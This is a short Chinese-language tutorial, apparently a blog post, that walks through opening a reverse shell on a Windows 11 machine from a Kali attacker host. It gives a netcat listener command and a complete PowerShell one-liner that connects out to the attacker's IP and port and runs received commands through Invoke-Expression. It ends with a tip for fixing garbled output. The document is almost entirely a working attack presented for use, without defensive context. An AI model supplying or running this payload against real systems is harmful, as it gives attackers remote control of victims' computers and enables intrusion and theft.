直奔主题,上操作流程
友情提示:攻击机为kali,靶机为Windows11
- 用攻击机的命令行监听一个目标端口
nc -lvvp 目标端口
- 在Windows桌面同时按住shift和鼠标右键,选择在此处打开powershell窗口
输入以下指令
$LHOST = "攻击机IP地址"; $LPORT = 攻击机监听的目标端口; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream =$TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0,$Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0,
>> $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output =try { Invoke-Expression ($Code) 2>&1 } catch { $_ };$StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close();$NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()
3. 随后攻击机上就会显示靶机的IP地址,并可以使用DOS指令获取靶机的信息了
注意:如果在攻击机输入相关指令过后返回的数据出现中文乱码的情况,输入chcp 65001即可